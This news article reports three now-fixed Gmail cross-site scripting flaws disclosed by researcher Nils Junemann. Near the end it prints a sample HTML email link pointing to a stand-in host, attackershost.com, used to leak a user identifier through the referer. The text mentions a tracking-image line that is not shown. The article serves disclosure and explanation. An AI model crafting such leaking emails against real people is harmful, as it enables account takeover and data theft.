Over the past few months, security researcher Nils Junemann has notified Google of the presence of serious persistent cross-site scripting (XSS) vulnerabilities that affected Gmail. The expert has revealed that all the security holes have been fixed.
In a blog post
, Junemann detailed three different vulnerabilities that he had found in Gmail.
The first issue he describes refers to a persistent DOM XSSS flaw in Gmail’s mobile view. The weakness appeared when emails that contained a specific subject line were forwarded.
While the issue had been addressed in a relatively short amount of time, during the fixing process “something went wrong” as, for a few hours, all the forwarded messages contained a message saying “The body is already escaped.”
The second vulnerability reported by the expert was a common reflective DOM XSS in the mobile view.
A third issue he had found in Gmail turned out to be the more interesting.
Before completely patching the problem, Google’s Security Team blocked a particular GET parameter and displayed the following message for users: We're sorry ... but your computer or network may be sending automated queries. To protect our users, we can't process your request right now.
So, what did Junemann actually find?
He discovered that when Google displays a message directly, there are a couple of parameters in the URL that could be exploited by the attacker: ik
(a static ID for that particular user) and th
(the message ID).
According to the expert, an attacker could “force a 'HTTP/1.1 500 Internal Server Error' with some lines of the message” by using a specially crafted URL.
However, to create that special URL, the ik
would have to be known, but the researcher has shown that the values can be easily obtained by relying on “referer leaking.”
By sending the victim an HTML email with some cleverly designed, yet simple, code, he was able to leak the values of ik
to an arbitrary domain owned by the attacker.
Here’s what the HTML email looks like:
<a rel="nofollow" rel="nofollow" href="https://attackershost.com/gmailxss">Click here to have fun</a>
In the first line of code the 1x1.gif
leaks the values to attackershost.com
, while the second has the same effect once the victim clicks on the link.